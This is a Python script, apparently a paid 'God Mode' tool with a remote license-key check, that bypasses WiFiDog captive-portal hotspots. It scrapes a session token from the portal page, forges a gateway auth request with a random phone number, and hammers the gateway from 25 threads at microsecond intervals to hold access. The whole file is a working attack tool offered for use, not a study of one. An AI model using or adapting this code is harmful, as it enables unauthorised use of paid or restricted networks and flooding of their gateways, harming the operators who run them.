import requests
import subprocess
import re
import urllib3
import time
import threading
import logging
import random
import sys
import datetime
import os
import socket
from urllib.parse import urlparse, parse_qs, urljoin

# SSL Disable
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# ===============================
# GLOBAL CONFIGURATION
# ===============================
VALID_KEYS_URL = "https://raw.githubusercontent.com/Zyan091/my-database/refs/heads/main/key.txt"
PING_THREADS = 25  # Maximum Power
MIN_INTERVAL = 0.00001 # Extreme Frequency
MAX_INTERVAL = 0.0001

# GOD MODE COLORS
R = "\033[38;5;196m" # Red
G = "\033[38;5;46m"  # Green
C = "\033[38;5;51m"  # Cyan
Y = "\033[38;5;226m" # Yellow
M = "\033[38;5;201m" # Magenta
W = "\033[38;5;255m" # White
B = "\033[38;5;21m"  # Blue
GOLD = "\033[38;5;220m"
RESET = "\033[0m"

stop_event = threading.Event()

# ===============================
# SYSTEM TOOLS
# ===============================
def get_hwid():
    try:
        user_id = subprocess.check_output('whoami', shell=True).decode().strip()
        return f"ZYAN-GOD-{user_id.upper()}-8899"
    except:
        return "ZYAN-GOD-USER"

def clear(): os.system('clear')

def god_banner():
    clear()
    banner = f"""
{R}    в•”в•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•—
{GOLD}       рџЊё  вќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏ  рџЊё
{M}       в–€в–€в–€в–€в–€в–€в–€в•—в–€в–€в•—   в–€в–€в•— в–€в–€в–€в–€в–€в•— в–€в–€в–€в•—   в–€в–€в•—  в–€в–€в–€в–€в–€в–€в•—  в–€в–€в–€в–€в–€в–€в•— 
{M}       в•љв•ђв•ђв–€в–€в–€в•”в•ќв•љв–€в–€в•— в–€в–€в•”в•ќв–€в–€в•”в•ђв•ђв–€в–€в•—в–€в–€в–€в–€в•—  в–€в–€в•‘ в–€в–€в•”в•ђв•ђв•ђв•ђв•ќ в–€в–€в•”в•ђв•ђв•ђв–€в–€в•—
{M}         в–€в–€в–€в•”в•ќ  в•љв–€в–€в–€в–€в•”в•ќ в–€в–€в–€в–€в–€в–€в–€в•‘в–€в–€в•”в–€в–€в•— в–€в–€в•‘ в–€в–€в•‘  в–€в–€в–€в•—в–€в–€в•‘   в–€в–€в•‘
{M}        в–€в–€в–€в•”в•ќ    в•љв–€в–€в•”в•ќ  в–€в–€в•”в•ђв•ђв–€в–€в•‘в–€в–€в•‘в•љв–€в–€в•—в–€в–€в•‘ в–€в–€в•‘   в–€в–€в•‘в–€в–€в•‘   в–€в–€в•‘
{M}       в–€в–€в–€в–€в–€в–€в–€в•—   в–€в–€в•‘   в–€в–€в•‘  в–€в–€в•‘в–€в–€в•‘ в•љв–€в–€в–€в–€в•‘ в•љв–€в–€в–€в–€в–€в–€в•”в•ќв•љв–€в–€в–€в–€в–€в–€в•”в•ќ
{M}       в•љв•ђв•ђв•ђв•ђв•ђв•ђв•ќ   в•љв•ђв•ќ   в•љв•ђв•ќ  в•љв•ђв•ќв•љв•ђв•ќ  в•љв•ђв•ђв•ђв•ќ  в•љв•ђв•ђв•ђв•ђв•ђв•ќ  в•љв•ђв•ђв•ђв•ђв•ђв•ќ 
{GOLD}       рџЊё  вќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏвќ¤пёЏ  рџЊё
{R}    в•љв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ђв•ќ
{C}               >>> GOD MODE: SUPREME NETWORK ENGINE <<<
    """
    print(banner)

# ===============================
# SUPREME SECURITY
# ===============================
def verify_access():
    my_id = get_hwid()
    god_banner()
    print(f"{C} рџ›   DEVICE INFO: {W}{my_id}{RESET}")
    print(f"{C} в”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓ{RESET}")
    
    key = input(f"\n{W} [?] ACCESS KEY {G}В» {GOLD}").strip()
    if not key: return False

    print(f"{Y} [*] Authorizing via Cloud...{RESET}", end="\r")
    try:
        res = requests.get(VALID_KEYS_URL, timeout=15)
        if res.status_code == 200:
            for line in res.text.splitlines():
                if "|" in line:
                    db_key, db_id, exp = [i.strip() for i in line.split("|")]
                    if key == db_key:
                        if db_id != my_id:
                            print(f"\n{R} [!] LOCK ERROR: Registered to {db_id}{RESET}")
                            return False
                        
                        exp_dt = datetime.datetime.strptime(exp, '%Y-%m-%d')
                        if datetime.datetime.now() > exp_dt:
                            print(f"\n{R} [!] KEY EXPIRED!{RESET}")
                            return False
                        
                        print(f"\n{G} [вњ“] WELCOME GOD USER. ACCESS GRANTED!{RESET}")
                        time.sleep(1)
                        return True
            print(f"\n{R} [X] INVALID KEY.{RESET}")
        else: print(f"\n{R} [!] DATABASE OFFLINE.{RESET}")
    except: print(f"\n{R} [!] NETWORK ERROR.{RESET}")
    return False

# ===============================
# GOD-SPEED BYPASS ENGINE
# ===============================
def check_internet():
    try:
        # DNS Check (Faster)
        socket.setdefaulttimeout(2)
        socket.gethostbyname("www.google.com")
        return True
    except: return False

def high_frequency_pulse(auth_link, sid):
    session = requests.Session()
    # Advanced Headers
    headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36',
        'Accept': '*/*',
        'Connection': 'keep-alive',
        'Cache-Control': 'no-cache'
    }
    while not stop_event.is_set():
        try:
            session.get(auth_link, headers=headers, timeout=3, verify=False)
            # Live Status Animation
            icons = ["рџ”Ґ", "вљЎ", "вњЁ", "рџљЂ"]
            print(f"{G}[GOD-MODE]{RESET} {GOLD}BYPASSING{RESET} {random.choice(icons)} {C}SID:{sid[:5]}{RESET} | {R}FREQ: MAX{RESET}   ", end="\r")
        except: break
        time.sleep(random.uniform(MIN_INTERVAL, MAX_INTERVAL))

def start_god_engine():
    god_banner()
    print(f"{Y}[*] Injecting God-Mode Pulse...{RESET}")
    
    while not stop_event.is_set():
        try:
            r = requests.get("http://connectivitycheck.gstatic.com/generate_204", timeout=5)
            if r.status_code == 204 and check_internet():
                print(f"{G}[вЂў]{RESET} Connection Supreme. Monitoring...          ", end="\r")
                time.sleep(5); continue

            portal_url = r.url
            print(f"\n{M}[!] FIREWALL DETECTED! CRACKING...{RESET}")
            
            # Phase 1: Capture
            res = requests.Session().get(portal_url, verify=False, timeout=10)
            sid = None
            
            # Deep Scan for SID
            sid_patterns = [r'sessionId=([a-zA-Z0-9\-]+)', r'token=([a-zA-Z0-9\-]+)', r'id=([a-zA-Z0-9\-]+)']
            for pattern in sid_patterns:
                match = re.search(pattern, res.url) or re.search(pattern, res.text)
                if match:
                    sid = match.group(1); break
            
            if sid:
                print(f"{G}[вњ“] SYSTEM CRACKED! TOKEN: {GOLD}{sid}{RESET}")
                params = parse_qs(urlparse(portal_url).query)
                gw_addr = params.get('gw_address', ['192.168.60.1'])[0]
                gw_port = params.get('gw_port', ['2060'])[0]
                auth_link = f"http://{gw_addr}:{gw_port}/wifidog/auth?token={sid}&phonenumber={random.randint(10000,99999)}"

                # Phase 2: Ultimate Pulse
                print(f"{C}[*] WAKING UP {PING_THREADS} GOD-THREADS...{RESET}")
                for _ in range(PING_THREADS):
                    threading.Thread(target=high_frequency_pulse, args=(auth_link, sid), daemon=True).start()

                while check_internet():
                    time.sleep(10)
                    if stop_event.is_set(): break
        except: time.sleep(5)

if __name__ == "__main__":
    try:
        if verify_access():
            start_god_engine()
        else:
            input(f"\n{W} Press Enter to Exit...{RESET}")
    except KeyboardInterrupt:
        stop_event.set()
        print(f"\n{R} [!] GOD MODE TERMINATED.{RESET}")
